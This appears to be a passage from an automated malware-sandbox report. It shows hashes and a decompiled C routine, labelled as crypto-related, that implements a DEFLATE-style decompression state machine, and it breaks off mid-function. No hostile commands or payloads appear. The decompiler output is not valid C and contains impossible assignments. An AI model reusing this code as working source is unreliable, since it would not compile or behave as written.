              • Instruction ID: 3502f7cb5a3af0c493bbd305694cfe7c42c1de1d9d4b3f0f41be89705d4c2d6c
              • Opcode Fuzzy Hash: e7e03b24fd26e53a165a1727b6dbd5fa1e284f3aa870073fdfa23fadb09b4614
              • Instruction Fuzzy Hash: 8402045485D2EDADDB06CBF945607FCBFB05D2A102F0841CAE4E5E6283C53A938EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406354, Relevance: .3, Instructions: 334COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 79%
              			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
